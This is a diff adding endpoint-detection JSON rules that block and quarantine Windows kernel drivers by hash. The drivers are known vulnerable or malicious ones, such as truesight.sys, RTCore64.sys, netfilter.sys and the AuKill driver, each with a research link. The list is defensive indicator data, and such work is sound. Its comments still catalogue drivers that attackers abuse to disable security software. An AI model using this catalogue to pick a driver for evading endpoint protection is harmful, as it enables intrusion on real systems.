+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826251Z",
+ "creation_date": "2026-03-23T11:45:31.826253Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826261Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a57065508fcf79d4ada8dfff3960832fc5965e51733ae0aa3a5d280a4064e5c7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3137042b-1339-507c-a5f2-44a47bff5d4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159312Z",
+ "creation_date": "2026-03-23T11:45:31.159314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0c8d9088dc4f244448c52981a1787abacd05479b82a96ef3afd6e2df19794c1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "313e93bd-80ac-5af6-a9d7-8ba5cff3779e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154076Z",
+ "creation_date": "2026-03-23T11:45:31.154078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154083Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f1f37add1d46ef96b65eb6b7c391634daf8bc05ab6974309e78134c2b2bdf81",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3142ec86-2409-58ab-94c5-cd01beaa2697",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808377Z",
+ "creation_date": "2026-03-23T11:45:31.808379Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808385Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec3523b3ae9f1e93bd536d2bfd6bf7009f88cd72180fea24cc02e17b01b9c889",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "315327da-365c-587f-b3a4-362d429c6631",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492320Z",
+ "creation_date": "2026-03-23T11:45:31.492322Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b4292dd2aa44e4a733a24aa3b49af054eede5f94bb18ed70a8ed7e8f3f7d003",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3159d35b-ef9c-53ad-b182-3d96a63b694e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827910Z",
+ "creation_date": "2026-03-23T11:45:30.827912Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0a96853916610e6482d05a736227f1714f3788446c30fc01580ebee8aa293aa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31640dd0-8643-5767-823f-94c52d42d706",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621072Z",
+ "creation_date": "2026-03-23T11:45:29.621074Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621079Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d",
+ "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3169d357-3608-594c-9e8d-6fa626e7e748",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457069Z",
+ "creation_date": "2026-03-23T11:45:30.457073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457082Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "773dc9256c4eada182a5b41179a522740ba994eff30f868641bc91574705b8e3",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "316aa217-e371-521b-83bf-3e888dd7467f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460984Z",
+ "creation_date": "2026-03-23T11:45:30.460987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67cd6166d791bdf74453e19c015b2cb1e85e41892c04580034b65f9f03fe2e79",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "316ab67d-e06a-5444-b59a-d4cf7b2f5aee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807928Z",
+ "creation_date": "2026-03-23T11:45:31.807931Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807940Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22d850d29f5bae36a8981a5fe6464e6fe8759802efaaedd5be5de1ac9d5f521b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "316fbe63-f1e5-5dd6-a2cf-6c55dadbb027",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152704Z",
+ "creation_date": "2026-03-23T11:45:31.152706Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd85a6de046a79940fe6db2228c0089f11cbd5b8f7b5dab5ea3c54de69f7f905",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "317cd096-8e96-54f7-b938-fb3ffefd8bc7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824587Z",
+ "creation_date": "2026-03-23T11:45:31.824591Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824600Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3434fb840a9987286f03a9653588f1798075a53fcacac6137bf58f98e632cbdb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31899b63-d7c0-5aa9-93da-44795b287fe0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.603976Z",
+ "creation_date": "2026-03-23T11:45:29.603978Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.603984Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7509d30b279e30893db7851a2912a5ffb29ec7e839220890d76de8e3a57b4872",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "318a83c6-7093-5733-bb90-7a379ee4ea21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983386Z",
+ "creation_date": "2026-03-23T11:45:29.983388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983394Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b8887921e4a22e24fd058ba5ac40061b4bb569ac7207b9548168af9d6995e7c",
+ "comment": "Vulnerable Kernel Driver (aka kbdcap64.sys) [https://www.loldrivers.io/drivers/6a7d882b-3d9d-4334-be5f-2e29c6bf9ff8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "318b0fcc-b94d-50af-884d-bea43d54cfe1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822761Z",
+ "creation_date": "2026-03-23T11:45:31.822764Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2060c11cd0b210644db7af370f95fcb5c532e99a1cd09a6d56b8aaed2c040f15",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "318cabe3-d870-5a43-b6cc-7f832a23f946",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488639Z",
+ "creation_date": "2026-03-23T11:45:31.488641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488646Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8855f2a86d7447e75797314eace8ea6bddb960811e33fbb858ce3a1b39c48344",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "318f10e7-75a4-5f88-8734-a7942a045f26",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967640Z",
+ "creation_date": "2026-03-23T11:45:29.967642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57038bb35abfae1e216782043c710be6972f49beae5b0f7b2b524f152d27eda5",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3193a6bc-e636-569f-bb47-d0f1f53630aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822424Z",
+ "creation_date": "2026-03-23T11:45:30.822426Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822431Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "448048bafeb3796bfce954dd78e1b90f5849d9b3459c51750f210da8bafb8753",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31a48dbf-0638-585c-beca-635c01631411",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148416Z",
+ "creation_date": "2026-03-23T11:45:31.148418Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148424Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "415af8037165a928dbb77fb07599666acb3f5c816219971f76051a7e40ca6b30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31a5d259-fe11-56c5-962b-5a6080060d61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980481Z",
+ "creation_date": "2026-03-23T11:45:29.980483Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e28142ad02a1ac63ab86f97834321f30bb28e19d5c997bb0a13807ddb414c0e",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31b9cd4e-81db-5d44-92bd-7d33f1f2e368",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976782Z",
+ "creation_date": "2026-03-23T11:45:29.976784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f571b5302e900254cb1a46a7e1dd9190bceecb24c73ef3e36b4ff59517ad1e37",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31be4bd4-eabc-5407-99ea-c1917330299c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152390Z",
+ "creation_date": "2026-03-23T11:45:31.152394Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152403Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eef20092ec73e387548789a739a64c8027dc18231ede2acf50891abff12242a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "31c13a82-b385-5970-b146-9bc0c3aaf02a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
